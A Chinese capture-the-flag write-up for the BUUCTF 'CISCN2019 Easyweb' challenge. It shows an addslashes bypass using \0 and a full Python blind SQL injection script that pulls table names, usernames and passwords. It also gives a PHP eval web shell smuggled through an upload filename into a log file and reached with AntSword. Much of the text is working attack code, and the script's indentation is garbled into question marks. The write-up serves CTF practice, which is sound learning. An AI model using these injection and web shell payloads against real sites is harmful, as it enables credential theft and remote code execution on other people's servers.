Easy web
打开题目,用dirsearch扫到robots.txt
找到备份
发现只有image可用
下载备份
addslashes() 函数返回在预定义字符之前添加反斜杠的字符串。
源码里还看到,还会把\0,%00,\替换为空.
可以传递id和path两个参数,触发SQL注入,前提是要绕过对id和path的过滤。接下来想办法绕过过滤,主要是破坏单引号。
测试代码
?如果传入一个\\0,经addslashes()函数后变成\\\0
\\0被过滤成空,最后传入id=’\’,而\转义了 ’?致使id闭合,
select * from images where id='\' or path='{$path}'
我们就可以在path处注入我们的新语句
借鉴大佬的python脚本(BUUCTF-[CISCN2019 总决赛 Day2 Web1]Easyweb_AndyNoel的博客-CSDN博客)
import requests
import time"""
res =url + 'image.php?id=\\0&path=or%20ord(substr(database(),{},1))>{}%23'
print('数据库名为:',test(res)) ?ciscnfinal
res =url + 'image.php?id=\\0&path=or%20ord(substr((select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=0x636973636e66696e616c),{},1))>{}%23'
print('表名为:',test(res)) ? images,users
res =url + 'image.php?id=\\0&path=or%20ord(substr((select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_schema=0x636973636e66696e616c and table_name=0x7573657273),{},1))>{}%23'
print('列名为:',test(res)) ? username,password"""
url ='http://24d59353-1bc1-4f35-bda0-9d898cf151e9.node4.buuoj.cn:81/'
def test(url):
? ? s = ''
? ? for i in range(1,50):
? ? ? ? begin = 32
? ? ? ? ends = 126
? ? ? ? mid = (begin+ends)//2
? ? ? ? while begin<ends:
? ? ? ? ? ? r = requests.get(url.format(i,mid))
? ? ? ? ? ? if r.content!=b'':
? ? ? ? ? ? ? ? begin = mid+1
? ? ? ? ? ? ? ? mid = (begin+ends)//2
? ? ? ? ? ? else:
? ? ? ? ? ? ? ? ends = mid
? ? ? ? ? ? ? ? mid = (begin+ends)//2
? ? ? ? if mid == 32:
? ? ? ? ? ? break
? ? ? ? s+=chr(mid)
? ? ? ? print(s)
? ? return s.rstrip()
res =url + 'image.php?id=\\0&path=or%20ord(substr((select%20group_concat(username)%20from%20users),{},1))>{}%23'
print('用户名为:',test(res))
res =url + 'image.php?id=\\0&path=or%20ord(substr((select%20group_concat(password)%20from%20users),{},1))>{}%23'
print('密码为:',test(res))
跑出来的用户名为admin密码为87f24beb54295d600e67
随便上传一个php文件
被过滤
尝试抓包修改成phtml,发现没被过滤
?同时也发现,该文件是被写入到日志中
我们可以直接修改文件名写入一句话
因为文件名不允许出现php,所以我们可以用短标签绕过
修改文件名为<?=@eval($_POST['QAQ']);?>
拿到写入位置
?蚁剑访问
?得到flag